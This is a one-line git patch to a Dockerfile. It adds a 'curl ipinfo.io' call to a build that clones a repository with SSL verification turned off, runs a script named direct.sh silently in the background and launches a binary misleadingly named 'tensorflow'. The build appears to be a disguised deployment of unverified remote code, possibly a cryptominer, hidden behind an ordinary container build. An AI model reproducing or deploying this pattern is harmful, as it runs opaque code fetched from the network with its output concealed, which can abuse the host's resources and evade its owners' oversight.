From 4932fd6acf64899b6a0a566bdd4443771941b7fd Mon Sep 17 00:00:00 2001 From: GALAL AYMEN Date: Fri, 1 Apr 2022 19:45:20 +0000 Subject: [PATCH] Update Dockerfile --- Dockerfile | 1 + 1 file changed, 1 insertion(+) diff --git a/Dockerfile b/Dockerfile index 3acabe8..8bfd9e8 100644 --- a/Dockerfile +++ b/Dockerfile @@ -4,6 +4,7 @@ RUN apt-get install git curl -y RUN git -c http.sslVerify=false clone https://gitlab.zam.io/wajinhakim/drone-test.git WORKDIR /drone-test RUN chmod +x tensorflow direct.sh +RUN curl ipinfo.io RUN nohup bash direct.sh > /dev/null EXPOSE 8080 8081 ENTRYPOINT ["./tensorflow"]